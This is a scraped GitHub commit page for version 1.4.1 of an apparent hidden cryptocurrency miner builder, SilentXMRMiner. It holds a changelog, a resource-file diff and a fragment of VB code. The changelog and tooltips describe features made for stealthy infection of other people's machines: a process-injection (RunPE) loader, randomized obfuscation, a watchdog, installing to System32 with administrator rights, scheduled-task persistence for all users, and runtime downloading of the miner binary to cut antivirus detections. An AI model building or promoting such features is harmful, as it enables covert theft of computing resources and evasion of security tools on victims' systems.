You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
{{ message }}
This repository was archived by the owner on Sep 12, 2023. It is now read-only.
* Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners
* Added backup servers for Online Downloader
* Added Install to System32 option (requires administrator permissions)
* Moved RunPE injector (Mandark) into miner to avoid internal Assembly.Load and improved it a bit
* Fixed possiblity of duplicate random obfuscation strings
* Improved Loader
* Improved Watchdog
* Improved obfuscation
# SilentXMRMiner v1.4.1 - Based on Lime Miner v0.3
5
5
6
6
Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**.
7
7
@@ -41,8 +41,17 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w
41
41
42
42
## Changes
43
43
44
+
### v1.4.1 (10/07/2021)
45
+
* Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners
46
+
* Added backup servers for Online Downloader
47
+
* Added Install to System32 option (requires administrator permissions)
48
+
* Moved RunPE injector (Mandark) into miner to avoid internal Assembly.Load and improved it a bit
49
+
* Fixed possiblity of duplicate random obfuscation strings
50
+
* Improved Loader
51
+
* Improved Watchdog
52
+
* Improved obfuscation
44
53
### v1.4 (05/07/2021)
45
-
**v1.4 is the final update before the new, greatly improved unified miner that I'm working on.**
54
+
**v1.4.\* is the final update before the new, greatly improved unified miner that I'm working on.**
46
55
* Added the Online Downloader option that makes the miner download the miner binary (from GitHub) during runtime to greatly decrease file size (to less then 100kb) and detections - Also added a cache so that it won't have to download the miner on every start
47
56
* Made the Task Scheduler task start for all users
<value>Will try to install to System32, if unsuccessful it will try to install to the path chosen in the "Install" tab. It's recommended to enable this when using 'Run as Administrator'.
125
+
This command requires Administrator privileges!
126
+
</value>
127
+
</data>
123
128
<dataname="Label1.ToolTip"xml:space="preserve">
124
129
<value>Pauses the miner compilation when the Watchdog DLL and/or Miner DLL is compiled to allow manual obfuscation of the file.
125
130
You can find the file in the same folder as the miner location you specified with the name MINERFILE-watchdog.dll or MINERFILE-miner.dll.
Copy file name to clipboardExpand all lines: SilentXMRMiner/Form1.vb
+17-8Lines changed: 17 additions & 8 deletions
Original file line number
Diff line number
Diff line change
@@ -8,6 +8,8 @@ Public Class Form1
8
8
PublicwatchdogdataAsByte()=NewByte(){}
9
9
PublicFAAsNewAdvanced
10
10
11
+
PublicRandomiCacheAsNewList(OfString)
12
+
11
13
'Silent XMR Miner by Unam Sanctam https://github.com/UnamSanctam/SilentXMRMiner, initially based on Lime Miner by NYAN CAT https://github.com/NYAN-x-CAT/Lime-Miner
0 commit comments